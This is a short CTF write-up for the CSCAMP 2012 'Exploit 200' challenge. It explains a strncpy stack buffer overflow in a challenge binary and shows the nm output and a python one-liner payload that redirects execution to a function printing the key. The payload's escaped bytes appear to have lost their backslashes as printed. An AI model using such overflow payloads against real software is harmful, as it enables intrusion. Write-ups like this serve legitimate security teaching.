CSCAMP CTF 2012 - Exploit 200

less than 1 minute read

This binary is vulnerable to a buffer overflow in the strncpy function called in the main function with user supplied input. It takes in two arguments, argument 1 being the offset of the address on the stack of the value to copy data from, and argument 2 being the number of bytes to copy. The size of the buffer being copied to is a maximum of 280 bytes. Since the binary has a function containing a call to system(“cat key.txt”), we may simply replace the saved frame pointer with the function address.

amon@Alyx:~/cscamp/exp200$ nm level200
0000000000600e40 d _DYNAMIC
...
0000000000400654 T cat_key
...
0000000000400669 T main
...
U system@@GLIBC_2.2.5

Our address is 0x0000000000400654. We may craft the exploit now, knowing the offset of the saved frame pointer (%RSP+280), and the address of our cat_key. We simply need to copy more than 288 bytes (we choose 300 arbitrarily) from the 3rd argument offset in the stack, i.e. our third argument we pass.

amon@Alyx:~/cscamp/exp200$ ./level200 3 300 `python -c 'print "A"*280 +
"x54x06x40x00x00x00x00x00"'`
You entred :
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAT@
cat: ./key.txt: No such file or directory
Segmentation fault
amon@Alyx:~/cscamp/exp200$

Leave a Comment